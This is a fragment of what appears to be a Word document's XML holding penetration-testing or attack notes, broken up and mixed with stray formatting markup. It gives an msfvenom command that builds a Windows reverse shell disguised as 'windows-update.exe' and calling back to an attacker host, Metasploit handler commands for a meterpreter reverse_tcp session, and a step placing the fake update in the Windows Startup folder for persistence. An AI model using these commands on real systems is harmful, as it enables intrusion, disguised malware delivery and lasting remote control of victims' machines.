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 the reverse_shell-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msfvenom -p windows/shell/reverse_tcp LHOST=attacker_ip LPORT={attacker_port} -f exe &gt; windows-update.exe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color w:val="606666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606666"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole -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use exploit/multi/handler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 payload windows/meterpreter/reverse_tcp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 lhost {attacker_ip}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set lport {attacker_port}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exploit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 Persistence on the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upload ~/windows-update.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\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Upload the reverse shell to web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